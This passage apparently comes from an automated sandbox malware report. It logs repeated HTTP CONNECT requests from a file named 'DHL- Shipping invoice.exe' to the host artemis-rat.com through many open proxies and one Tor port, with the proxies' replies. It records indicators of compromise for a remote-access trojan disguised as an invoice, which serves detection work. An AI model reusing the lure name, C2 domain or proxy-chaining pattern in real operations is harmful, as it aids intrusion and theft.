                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.143271923 CET716INHTTP/1.1 405 Not Allowed
                            Server: nginx/1.23.4
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 559
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.23.4</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            816192.168.2.45261272.195.34.5841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.050400019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            817192.168.2.452613192.154.244.9290006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.052438021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            818192.168.2.452727104.17.62.87806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.065998077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.155462980 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            819192.168.2.452627172.96.193.7431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.068485975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.097639084 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            820192.168.2.452630174.77.111.19641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.068975925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            821192.168.2.45262472.195.34.60273916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.070647955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            822192.168.2.45260545.120.178.19710806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.081696033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            823192.168.2.45259831.43.158.10888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.082029104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            824192.168.2.452292117.160.250.13888996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.091542006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.672108889 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            825192.168.2.45265666.225.246.23880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.091897011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.250833035 CET731INHTTP/1.1 405 Not Allowed
                            Server: nginx/1.22.1
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 559
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            826192.168.2.450152162.214.121.11188096484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.092674017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197396040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.204747915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250403881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.322499037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.411922932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.452900887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:14.452909946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:02.508411884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            827192.168.2.451559202.138.248.10712126484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.101489067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.249989986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.233273029 CET19INHTTP/1.1 200 OK
                            Mar 12, 2024 08:37:10.236660004 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            828192.168.2.452673201.71.2.1039996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.106543064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562463045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.707469940 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            829192.168.2.45268251.158.79.76163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.122302055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562489033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.250055075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.429135084 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            830192.168.2.45263145.11.95.16560106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.122467995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            831192.168.2.449981148.66.130.187209626484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.123830080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.197395086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.204741001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.250402927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.322590113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.412017107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.452927113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:14.452924013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:02.508421898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            832192.168.2.452757162.159.246.135806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.151242971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.238811970 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            833192.168.2.452720185.162.60.680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.161731005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            834192.168.2.45263589.35.237.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.162034035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
